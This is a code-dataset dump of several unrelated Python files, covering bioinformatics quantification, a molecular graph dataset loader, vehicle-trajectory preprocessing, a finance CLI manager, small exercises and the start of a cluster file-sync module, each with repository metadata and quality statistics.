| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.181818
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8650d9e6c008eb69e8a60ee61bf0c6b0618f2c83
| 3,842
|
py
|
Python
|
humann2/quantify/families.py
|
dytk2134/humann2
|
9b8f212bdd910ee7187f06f1550f0c86bce0473b
|
[
"MIT"
] | null | null | null |
humann2/quantify/families.py
|
dytk2134/humann2
|
9b8f212bdd910ee7187f06f1550f0c86bce0473b
|
[
"MIT"
] | null | null | null |
humann2/quantify/families.py
|
dytk2134/humann2
|
9b8f212bdd910ee7187f06f1550f0c86bce0473b
|
[
"MIT"
] | null | null | null |
"""
HUMAnN2: quantify_families module
Compute alignments by gene family
Copyright (c) 2014 Harvard School of Public Health
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import os
import logging
import math
from .. import config
from .. import utilities
from .. import store
# name global logging instance
logger=logging.getLogger(__name__)
def gene_families(alignments,gene_scores,unaligned_reads_count):
"""
Compute the gene families from the alignments
"""
logger.debug("Compute gene families")
# Compute scores for each gene family for each bug set
alignments.convert_alignments_to_gene_scores(gene_scores)
# Process the gene id to names mappings
gene_names=store.Names(config.gene_family_name_mapping_file)
delimiter=config.output_file_column_delimiter
category_delimiter=config.output_file_category_delimiter
# Write the scores ordered with the top first
column_name=config.file_basename+"_Abundance-RPKs"
if config.remove_column_description_output:
column_name=config.file_basename
tsv_output=["# Gene Family"+delimiter+column_name]
# Add the unaligned reads count
tsv_output.append(config.unmapped_gene_name+delimiter+utilities.format_float_to_string(unaligned_reads_count))
# Print out the gene families with those with the highest scores first
for gene in gene_scores.gene_list_sorted_by_score("all"):
all_score=gene_scores.get_score("all",gene)
if all_score>0:
gene_name=gene_names.get_name(gene)
# Print the computation of all bugs for gene family
tsv_output.append(gene_name+delimiter+utilities.format_float_to_string(all_score))
# Process and print per bug if selected
if not config.remove_stratified_output:
# Print scores per bug for family ordered with those with the highest values first
scores_by_bug=gene_scores.get_scores_for_gene_by_bug(gene)
for bug in utilities.double_sort(scores_by_bug):
if scores_by_bug[bug]>0:
tsv_output.append(gene_name+category_delimiter+bug+delimiter
+utilities.format_float_to_string(scores_by_bug[bug]))
if config.output_format=="biom":
# Open a temp file if a conversion to biom is selected
tmpfile=utilities.unnamed_temp_file()
file_handle=open(tmpfile,'w')
file_handle.write("\n".join(tsv_output))
file_handle.close()
utilities.tsv_to_biom(tmpfile,config.genefamilies_file,"Gene")
else:
# Write output as tsv format
file_handle = open(config.genefamilies_file, "w")
file_handle.write("\n".join(tsv_output))
file_handle.close()
return config.genefamilies_file
| 40.442105
| 116
| 0.728267
| 534
| 3,842
| 5.050562
| 0.346442
| 0.032629
| 0.016314
| 0.032258
| 0.132369
| 0.08046
| 0.066741
| 0.066741
| 0.03337
| 0.03337
| 0
| 0.002313
| 0.212389
| 3,842
| 94
| 117
| 40.87234
| 0.888962
| 0.442998
| 0
| 0.1
| 0
| 0
| 0.032764
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025
| false
| 0
| 0.15
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
865144cd196eb39a73555fc643c117d083a615cc
| 744
|
py
|
Python
|
Buta Nicolae/threads.py
|
RazvanBalau/parallel-2020
|
bd9c0dea6cc70e167320f64632d7a235522dfdb3
|
[
"MIT"
] | null | null | null |
Buta Nicolae/threads.py
|
RazvanBalau/parallel-2020
|
bd9c0dea6cc70e167320f64632d7a235522dfdb3
|
[
"MIT"
] | null | null | null |
Buta Nicolae/threads.py
|
RazvanBalau/parallel-2020
|
bd9c0dea6cc70e167320f64632d7a235522dfdb3
|
[
"MIT"
] | 23
|
2020-01-15T15:02:39.000Z
|
2020-01-15T17:23:03.000Z
|
import threading
from multiprocessing import Queue
results = []
results2 = []
def take_numbers(q):
print('Enter the numbers:')
for i in range(0,3):
num1 = int(input('Enter first number: '))
num2 = int(input('Enter second number: '))
q.put(num1)
q.put(num2)
def add_num(q):
for i in range(0,3):
num1 = q.get()
num2 = q.get()
results.append(num1+num2)
results2.append(num1-num2)
q = Queue()
t2 = threading.Thread(target=add_num, args=(q, ))
t1 = threading.Thread(target=take_numbers, args=(q, ))
t2.start()
t1.start()
t2.join()
t1.join()
q.close()
for result in results:
print ("adunare =", result)
for result in results2:
print ("scadere =", result)
| 20.666667
| 54
| 0.606183
| 106
| 744
| 4.216981
| 0.40566
| 0.049217
| 0.026846
| 0.049217
| 0.076063
| 0.076063
| 0.076063
| 0
| 0
| 0
| 0
| 0.040636
| 0.239247
| 744
| 36
| 55
| 20.666667
| 0.749117
| 0
| 0
| 0.068966
| 0
| 0
| 0.103356
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.068966
| 0
| 0.137931
| 0.103448
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86517e62e82db5794921e6da0e41993351344585
| 576
|
py
|
Python
|
code_week11_76_712/unique_paths.py
|
dylanlee101/leetcode
|
b059afdadb83d504e62afd1227107de0b59557af
|
[
"Apache-2.0"
] | null | null | null |
code_week11_76_712/unique_paths.py
|
dylanlee101/leetcode
|
b059afdadb83d504e62afd1227107de0b59557af
|
[
"Apache-2.0"
] | null | null | null |
code_week11_76_712/unique_paths.py
|
dylanlee101/leetcode
|
b059afdadb83d504e62afd1227107de0b59557af
|
[
"Apache-2.0"
] | null | null | null |
'''
一个机器人位于一个 m x n 网格的左上角 (起始点在下图中标记为“Start” )。
机器人每次只能向下或者向右移动一步。机器人试图达到网格的右下角(在下图中标记为“Finish”)。
问总共有多少条不同的路径?
例如,上图是一个7 x 3 的网格。有多少可能的路径?
示例 1:
输入: m = 3, n = 2
输出: 3
解释:
从左上角开始,总共有 3 条路径可以到达右下角。
1. 向右 -> 向右 -> 向下
2. 向右 -> 向下 -> 向右
3. 向下 -> 向右 -> 向右
示例 2:
输入: m = 7, n = 3
输出: 28
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/unique-paths
'''
class Solution:
def uniquePaths(self, m: int, n: int) -> int:
dp = [1] + [0] * n
for i in range(m):
for j in range(n):
dp[j] = dp[j] + dp[j-1]
return dp[-2]
| 15.567568
| 49
| 0.552083
| 98
| 576
| 3.244898
| 0.55102
| 0.028302
| 0.031447
| 0.037736
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045673
| 0.277778
| 576
| 37
| 50
| 15.567568
| 0.71875
| 0.616319
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86524c143ea8ba1817f21135f1c0c27360fa74e8
| 3,361
|
py
|
Python
|
spektral/datasets/qm9.py
|
JonaBecher/spektral
|
ff59e16d959e0ec698428997363be20462625699
|
[
"MIT"
] | 2,145
|
2019-01-21T20:49:44.000Z
|
2022-03-28T20:27:27.000Z
|
spektral/datasets/qm9.py
|
jasper-park/spektral
|
ad2d96549c00f68ce992a7d29e2c3fd025fb529b
|
[
"MIT"
] | 259
|
2019-01-22T05:18:19.000Z
|
2022-03-25T10:46:10.000Z
|
spektral/datasets/qm9.py
|
jasper-park/spektral
|
ad2d96549c00f68ce992a7d29e2c3fd025fb529b
|
[
"MIT"
] | 322
|
2019-02-11T16:18:27.000Z
|
2022-03-24T16:26:59.000Z
|
import os
import os.path as osp
import numpy as np
from joblib import Parallel, delayed
from tensorflow.keras.utils import get_file
from tqdm import tqdm
from spektral.data import Dataset, Graph
from spektral.utils import label_to_one_hot, sparse
from spektral.utils.io import load_csv, load_sdf
ATOM_TYPES = [1, 6, 7, 8, 9]
BOND_TYPES = [1, 2, 3, 4]
class QM9(Dataset):
"""
The QM9 chemical data set of small molecules.
In this dataset, nodes represent atoms and edges represent chemical bonds.
There are 5 possible atom types (H, C, N, O, F) and 4 bond types (single,
double, triple, aromatic).
Node features represent the chemical properties of each atom and include:
- The atomic number, one-hot encoded;
- The atom's position in the X, Y, and Z dimensions;
- The atomic charge;
- The mass difference from the monoisotope;
The edge features represent the type of chemical bond between two atoms,
one-hot encoded.
Each graph has an 19-dimensional label for regression.
**Arguments**
- `amount`: int, load this many molecules instead of the full dataset
(useful for debugging).
- `n_jobs`: number of CPU cores to use for reading the data (-1, to use all
available cores).
"""
url = "https://deepchemdata.s3-us-west-1.amazonaws.com/datasets/gdb9.tar.gz"
def __init__(self, amount=None, n_jobs=1, **kwargs):
self.amount = amount
self.n_jobs = n_jobs
super().__init__(**kwargs)
def download(self):
get_file(
"qm9.tar.gz",
self.url,
extract=True,
cache_dir=self.path,
cache_subdir=self.path,
)
os.remove(osp.join(self.path, "qm9.tar.gz"))
def read(self):
print("Loading QM9 dataset.")
sdf_file = osp.join(self.path, "gdb9.sdf")
data = load_sdf(sdf_file, amount=self.amount) # Internal SDF format
def read_mol(mol):
x = np.array([atom_to_feature(atom) for atom in mol["atoms"]])
a, e = mol_to_adj(mol)
return x, a, e
data = Parallel(n_jobs=self.n_jobs)(
delayed(read_mol)(mol) for mol in tqdm(data, ncols=80)
)
x_list, a_list, e_list = list(zip(*data))
# Load labels
labels_file = osp.join(self.path, "gdb9.sdf.csv")
labels = load_csv(labels_file)
labels = labels.set_index("mol_id").values
if self.amount is not None:
labels = labels[: self.amount]
return [
Graph(x=x, a=a, e=e, y=y)
for x, a, e, y in zip(x_list, a_list, e_list, labels)
]
def atom_to_feature(atom):
atomic_num = label_to_one_hot(atom["atomic_num"], ATOM_TYPES)
coords = atom["coords"]
charge = atom["charge"]
iso = atom["iso"]
return np.concatenate((atomic_num, coords, [charge, iso]), -1)
def mol_to_adj(mol):
row, col, edge_features = [], [], []
for bond in mol["bonds"]:
start, end = bond["start_atom"], bond["end_atom"]
row += [start, end]
col += [end, start]
edge_features += [bond["type"]] * 2
a, e = sparse.edge_index_to_matrix(
edge_index=np.array((row, col)).T,
edge_weight=np.ones_like(row),
edge_features=label_to_one_hot(edge_features, BOND_TYPES),
)
return a, e
| 29.482456
| 80
| 0.621839
| 497
| 3,361
| 4.060362
| 0.352113
| 0.014866
| 0.014866
| 0.019326
| 0.040634
| 0.040634
| 0.025768
| 0
| 0
| 0
| 0
| 0.011722
| 0.26391
| 3,361
| 113
| 81
| 29.743363
| 0.803961
| 0.249331
| 0
| 0
| 0
| 0.015152
| 0.078215
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.136364
| 0
| 0.318182
| 0.015152
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
865416b109055549efa6918ca6073abc6d07a490
| 602
|
py
|
Python
|
code/Level 1 - Intro to CPX/5-acceleration/main.py
|
tscofield/cpx-training
|
682a2cef6bb164bc7c374744de94c21581258392
|
[
"MIT"
] | null | null | null |
code/Level 1 - Intro to CPX/5-acceleration/main.py
|
tscofield/cpx-training
|
682a2cef6bb164bc7c374744de94c21581258392
|
[
"MIT"
] | null | null | null |
code/Level 1 - Intro to CPX/5-acceleration/main.py
|
tscofield/cpx-training
|
682a2cef6bb164bc7c374744de94c21581258392
|
[
"MIT"
] | 1
|
2019-02-07T04:04:05.000Z
|
2019-02-07T04:04:05.000Z
|
from adafruit_circuitplayground.express import cpx
# Main loop gets x, y and z axis acceleration, prints the values, and turns on
# red, green and blue, at levels related to the x, y and z values.
while True:
if cpx.switch:
print("Slide switch off!")
cpx.pixels.fill((0, 0, 0))
continue
else:
R = 0
G = 0
B = 0
x, y, z = cpx.acceleration
print((x, y, z))
if x:
R = R + abs(int(x))
if y:
G = G + abs(int(y))
if z:
B = B + abs(int(z))
cpx.pixels.fill((R, G, B))
| 25.083333
| 78
| 0.503322
| 94
| 602
| 3.212766
| 0.468085
| 0.02649
| 0.033113
| 0.039735
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016129
| 0.38206
| 602
| 23
| 79
| 26.173913
| 0.795699
| 0.234219
| 0
| 0
| 0
| 0
| 0.037199
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.052632
| 0.105263
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86543345af40c82152fa05b0f713964bb091299c
| 7,692
|
py
|
Python
|
src/data_preprocess.py
|
QinganZhao/ML-based-driving-motion-prediction
|
5a7772cf199d30e4e33bbe943775c2e19aac5d5b
|
[
"MIT"
] | 18
|
2019-01-08T02:53:56.000Z
|
2022-03-03T11:34:20.000Z
|
src/data_preprocess.py
|
QinganZhao/ML-based-driving-motion-prediction
|
5a7772cf199d30e4e33bbe943775c2e19aac5d5b
|
[
"MIT"
] | null | null | null |
src/data_preprocess.py
|
QinganZhao/ML-based-driving-motion-prediction
|
5a7772cf199d30e4e33bbe943775c2e19aac5d5b
|
[
"MIT"
] | 7
|
2018-06-13T20:12:25.000Z
|
2022-02-20T08:39:07.000Z
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
import matplotlib.patches as patches
def load_data(file_name, car_flag):
if car_flag == 1:
data = np.loadtxt('./car1/'+str(file_name))
elif car_flag == 2:
data = np.loadtxt('./car2/'+str(file_name))
return data
def get_low_freq_data(data):
"""
Return a data matrix with 0.1s per time step data. (from 0.01s data)
"""
matrix = np.zeros((1, data.shape[1]))
for i in range(data.shape[0]):
if i % 10 == 0:
matrix = np.concatenate((matrix, data[i,:].reshape(1,data.shape[1])),axis=0)
return matrix[1:,:]
def data_process():
"""
This function serves to concatenate the information of two cars into one array.
Note: car1 -- mainlane car;
car2 -- merging car;
OutFormat:
0 case_ID
1 frame_ID
2 car1_long_pos
3 car1_long_vel
4 car1_lateral_pos
5 car1_lateral_displacement
6 car2_long_pos
7 car2_long_vel
8 car2_lateral_pos
9 car2_lateral_displacement
10 relative_long_vel (merge - mainlane)
11 relative_lateral_distance (merge - mainlane)
12 relative_long_distance (merge - mainlane)
13 car1_yaw
14 car2_yaw
15 situation label: (0: car1 yields car2; 1: car2 yields car1)
"""
data_matrix = np.zeros((1,16))
for i in range(128):
file_name_1 = 'data_'+str(i)+'_1.txt'
file_name_2 = 'data_'+str(i)+'_2.txt'
car1 = get_low_freq_data(load_data(file_name_1, 1))
car2 = get_low_freq_data(load_data(file_name_2, 2))
T = int(car1.shape[0])
#print(T)
current_data_matrix = np.zeros((T,16))
for j in range(1, T):
current_data_matrix[j,0] = i
current_data_matrix[j,1] = j
current_data_matrix[j,2] = car1[j,1]
current_data_matrix[j,3] = 10 * (car1[j,1] - car1[j-1,1])
current_data_matrix[j,4] = car1[j,2]
current_data_matrix[j,5] = car1[j,2] - car1[j-1,2]
current_data_matrix[j,6] = car2[j,1]
current_data_matrix[j,7] = 10 * (car2[j,1] - car2[j-1,1])
current_data_matrix[j,8] = car2[j,2]
current_data_matrix[j,9] = car2[j,2] - car2[j-1,2]
current_data_matrix[j,10] = current_data_matrix[j,7] - current_data_matrix[j,3]
current_data_matrix[j,11] = current_data_matrix[j,8] - current_data_matrix[j,4]
current_data_matrix[j,12] = current_data_matrix[j,6] - current_data_matrix[j,2]
current_data_matrix[j,13] = car1[j,3]
current_data_matrix[j,14] = car2[j,3]
if car1[-1,1] > car2[-1,1]:
current_data_matrix[j,15] = 1
else:
current_data_matrix[j,15] = 0
current_data_matrix = current_data_matrix[1:, :]
data_matrix = np.concatenate((data_matrix, current_data_matrix),axis=0)
np.savetxt('./data_matrix.txt', data_matrix[1:,:],'%.4f')
##################################################################
def divide_data(data_matrix, segment_length):
"""
This function serves to separate two situation cases.
"""
situation0_data = data_matrix[np.where(data_matrix[:,-1] == 0)]
situation1_data = data_matrix[np.where(data_matrix[:,-1] == 1)]
np.savetxt('./all_trajs_1.txt', situation0_data, '%.4f')
np.savetxt('./all_trajs_2.txt', situation1_data, '%.4f')
# count seq lengths
# separate sequence segments
# all_trajs_seg_1 = np.zeros((1, data_matrix.shape[1]))
# all_trajs_seg_2 = np.zeros((1, data_matrix.shape[1]))
all_trajs_1 = np.zeros((1, data_matrix.shape[1]))
all_trajs_2 = np.zeros((1, data_matrix.shape[1]))
count0, count1 = [], []
# for i in range(128):
# print('i = '+str(i))
# temp_data = data_matrix[np.where(data_matrix[:,0] == i)]
# if temp_data[0,-1] == 0:
# for j in range(temp_data.shape[0]-segment_length+1):
# temp_seg_data = temp_data[j:j+segment_length, :]
# count0.append(temp_seg_data.shape[0])
# all_trajs_seg_1 = np.concatenate((all_trajs_seg_1, temp_seg_data),axis=0)
# else:
# for j in range(temp_data.shape[0]-segment_length+1):
# temp_seg_data = temp_data[j:j+segment_length, :]
# count1.append(temp_seg_data.shape[0])
# all_trajs_seg_2 = np.concatenate((all_trajs_seg_2, temp_seg_data),axis=0)
for i in range(128):
print('i = '+str(i))
temp_data = data_matrix[np.where(data_matrix[:,0] == i)]
if temp_data[0,-1] == 0:
count0.append(temp_data.shape[0])
all_trajs_1 = np.concatenate((all_trajs_1, temp_data),axis=0)
elif temp_data[0,-1] == 1:
count1.append(temp_data.shape[0])
all_trajs_2 = np.concatenate((all_trajs_2, temp_data),axis=0)
print(all_trajs_1.shape)
print(all_trajs_2.shape)
print(sum(count0))
print(sum(count1))
# np.savetxt('./all_trajs_seg_1.txt', all_trajs_seg_1[1:,:], '%.4f')
# np.savetxt('./all_trajs_seg_2.txt', all_trajs_seg_2[1:,:], '%.4f')
np.savetxt('./all_trajs_seq_length_1.txt', np.array(count0), '%d')
np.savetxt('./all_trajs_seq_length_2.txt', np.array(count1), '%d')
#data_process()
#data_matrix = np.loadtxt('./data_matrix.txt')
#divide_data(data_matrix=data_matrix, segment_length=30)
###############################################
def check_data():
data = np.loadtxt('../simulation_data/data_matrix.txt')
temp_data = data[np.where(data[:,0]==69)]
T = temp_data.shape[0]
car1_long_vel = temp_data[:,3]
car2_long_vel = temp_data[:,7]
car1_acc = 10*(temp_data[1:,3]-temp_data[:-1,3])
car2_acc = 10*(temp_data[1:,7]-temp_data[:-1,7])
# plt.figure(1)
# plt.plot(range(T-1), car1_acc, c='b', label='main lane car acceleration')
# plt.plot(range(T-1), car2_acc, c='r', label='merging car acceleration')
# plt.legend()
plt.figure(2,figsize=(14,4))
plt.plot(range(T), car1_long_vel, c='b', label='main lane car velocity')
plt.plot(range(T), car2_long_vel, c='r', label='merging car velocity')
plt.legend()
plt.savefig('./long_vel_69.eps', bbox_inches='tight')
#plt.show()
#check_data()
###############################################
def plot_vehicles(case_id, data_matrix):
"""
This function is to plot vehicle trajectories with bounding boxes.
"""
current_case_data = data_matrix[np.where(data_matrix[:,0]==case_id)]
T = current_case_data.shape[0]
fig = plt.figure(figsize=(20,2))
for i in range(T):
if i<10:
name='00'+str(i)
elif i>=10 and i<100:
name = '0'+str(i)
elif i>=100:
name = str(i)
ax = fig.add_subplot(111, aspect='equal')
ax.add_patch(
patches.Rectangle(
(current_case_data[i,2]-2.0, current_case_data[i,4]-0.9), # (x,y)
4.0, # width
1.8, # height
alpha = 0.3 + 0.7*(T-i) / float(T),
facecolor='blue',
edgecolor='black',
linewidth=0.5
)
)
ax.add_patch(
patches.Rectangle(
(current_case_data[i,6]-2.0, current_case_data[i,8]-0.9), # (x,y)
4.0, # width
1.8, # height
alpha = 0.3 + 0.7*(T-i) / float(T),
facecolor='red',
edgecolor='black',
linewidth=0.5
)
)
ax.plot(range(-805,-360),-605*np.ones(445), color='k',linewidth=1)
ax.plot(range(-805,-584),-610*np.ones(221), color='k',linewidth=1)
ax.plot(range(-445,-360),-610*np.ones(85), color='k',linewidth=1)
x = [[-584,-805],[-445,-805]]
y = [[-610,-618],[-610,-622]]
for l in range(len(x)):
ax.plot(x[l], y[l], color='k',linewidth=1)
ax.set_xlim(-680, -400)
ax.set_ylim(-620, -600)
ax.set_xticks([])
ax.set_yticks([])
fig.savefig('./vehicles_plot/'+str(case_id)+'_'+str(name)+'.png', bbox_inches='tight')
data_matrix = np.loadtxt('./data_matrix.txt')
plot_vehicles(case_id=8, data_matrix=data_matrix)
| 29.136364
| 89
| 0.623375
| 1,246
| 7,692
| 3.614767
| 0.162921
| 0.130995
| 0.101909
| 0.091918
| 0.442496
| 0.318162
| 0.238455
| 0.181172
| 0.140764
| 0.099911
| 0
| 0.065277
| 0.189418
| 7,692
| 263
| 90
| 29.247148
| 0.657097
| 0.25637
| 0
| 0.121212
| 0
| 0
| 0.064361
| 0.017291
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.030303
| 0
| 0.090909
| 0.037879
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86545fd84ae7762d72208edf0f23289ff9f754a1
| 4,660
|
py
|
Python
|
balancesheet/equityManager.py
|
tylertjburns/ledgerkeeper
|
cd69e9f48f35a973d08e450dfffdfea46bdc3802
|
[
"MIT"
] | null | null | null |
balancesheet/equityManager.py
|
tylertjburns/ledgerkeeper
|
cd69e9f48f35a973d08e450dfffdfea46bdc3802
|
[
"MIT"
] | null | null | null |
balancesheet/equityManager.py
|
tylertjburns/ledgerkeeper
|
cd69e9f48f35a973d08e450dfffdfea46bdc3802
|
[
"MIT"
] | null | null | null |
import balancesheet.mongoData.equities_data_service as dsvce
from userInteraction.financeCliInteraction import FinanceCliInteraction
import ledgerkeeper.mongoData.account_data_service as dsvca
from balancesheet.enums import EquityClass, AssetType, LiabiltyType, EquityTimeHorizon, EquityStatus, EquityContingency
import plotter as plot
class EquityManager():
def __init__(self, user_notification_system: FinanceCliInteraction):
self.uns = user_notification_system
def add_equity(self):
name = self.uns.request_string("Name: ")
description = self.uns.request_string("Description: ")
accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
equityClass = self.uns.request_enum(EquityClass)
if equityClass == EquityClass.ASSET:
equityType = self.uns.request_enum(AssetType)
elif equityClass == EquityClass.LIABILITY:
equityType = self.uns.request_enum(LiabiltyType)
else:
raise Exception(f"Unknown equity class: {equityClass.name}")
interestRate = self.uns.request_float("Interest Rate: ")
equityTimeHorizon = self.uns.request_enum(EquityTimeHorizon)
equityStatus = self.uns.request_enum(EquityStatus)
equityContingency = self.uns.request_enum(EquityContingency)
equity = dsvce.enter_if_not_exists(name=name,
description=description,
accountId=str(dsvca.account_by_name(accountName).id),
equityClass=equityClass,
equityType=equityType,
equityTimeHorizon=equityTimeHorizon,
equityStatus=equityStatus,
equityContingency=equityContingency,
interestRate=interestRate)
if equity is not None:
self.uns.notify_user("Equity entered successfully!")
def delete_equity(self):
accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
equityName = self.uns.request_from_dict(dsvce.equities_as_dict())
dsvce.delete_equity(dsvca.account_by_name(accountName).id, equityName)
def record_value(self):
accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
equityName = self.uns.request_from_dict(dsvce.equities_as_dict())
year = self.uns.request_int("Year: ")
month = self.uns.request_int("Month: ")
value = self.uns.request_float("Value: ")
account = dsvca.account_by_name(accountName)
equity = dsvce.equity_by_account_and_name(str(account.id), equityName)
if equity is None:
raise Exception(f"Equity: {accountName} [{account.id}], {equityName} not found.")
value = dsvce.record_value_on_equity(equity, year, month, value)
if value is not None:
self.uns.notify_user("Value Recorded successfully!")
def print_value_snapshots(self, accountName=None):
if accountName is None:
accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
account = dsvca.account_by_name(accountName)
equities = dsvce.equities_by_account(account.id)
if equities is None or len(equities) == 0:
self.uns.notify_user(f"No Equities in account [{accountName}]")
return
self.uns.pretty_print_items(sorted(equities, key=lambda x: x.equityType),
title="Equities Snapshots")
def print_equities(self):
self.uns.pretty_print_items(dsvce.query_equities("").to_json(), title="Equities")
def print_balance_sheet(self):
accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
relevant_mos = self.uns.request_int("Number of past months: ")
account = dsvca.account_by_name(accountName)
data = dsvce.balance_sheet_over_time(relevant_months=relevant_mos, accountIds=[str(account.id)])
self.uns.notify_user(f"\n---------Balance Sheet---------")
self.uns.pretty_print_items(data)
def plot_balance_over_time(self):
relevant_mos = self.uns.request_int("Number of past months: ")
accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
account = dsvca.account_by_name(accountName)
ax = plot.plot_assets_liabilities_worth_over_time(relevant_mos, accountIds=[str(account.id)])
if ax is None:
self.uns.notify_user("No Data to show...")
| 43.551402
| 119
| 0.65279
| 507
| 4,660
| 5.763314
| 0.224852
| 0.074264
| 0.105407
| 0.049281
| 0.350445
| 0.288159
| 0.219713
| 0.201917
| 0.201917
| 0.201917
| 0
| 0.000288
| 0.254721
| 4,660
| 106
| 120
| 43.962264
| 0.84106
| 0
| 0
| 0.181818
| 0
| 0
| 0.079931
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103896
| false
| 0
| 0.064935
| 0
| 0.194805
| 0.077922
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8655870bbe029c575ef810e01964410eb82d6a13
| 10,603
|
py
|
Python
|
confluent_server/confluent/syncfiles.py
|
xcat2/confluent
|
47a83f4628df48638c2aebbfbcddc1531aac20d0
|
[
"Apache-2.0"
] | 27
|
2015-02-11T13:56:46.000Z
|
2021-12-28T14:17:20.000Z
|
confluent_server/confluent/syncfiles.py
|
jjohnson42/confluent
|
47a83f4628df48638c2aebbfbcddc1531aac20d0
|
[
"Apache-2.0"
] | 32
|
2015-09-23T13:19:04.000Z
|
2022-03-15T13:50:45.000Z
|
confluent_server/confluent/syncfiles.py
|
xcat2/confluent
|
47a83f4628df48638c2aebbfbcddc1531aac20d0
|
[
"Apache-2.0"
] | 24
|
2015-07-14T20:41:55.000Z
|
2021-07-15T04:18:51.000Z
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2021 Lenovo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import os
import shutil
import tempfile
import confluent.sshutil as sshutil
import confluent.util as util
import confluent.noderange as noderange
import eventlet
import pwd
import grp
def mkdirp(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != 17:
raise
def get_entries(filename):
secname = 'REPLACE:'
filename = filename.strip()
if filename[-1] == '>':
filename = filename[:-1]
with open(filename, 'r') as slfile:
slist = slfile.read()
entries = slist.split('\n')
for ent in entries:
ent = ent.split('#', 1)[0].strip()
if not ent:
continue
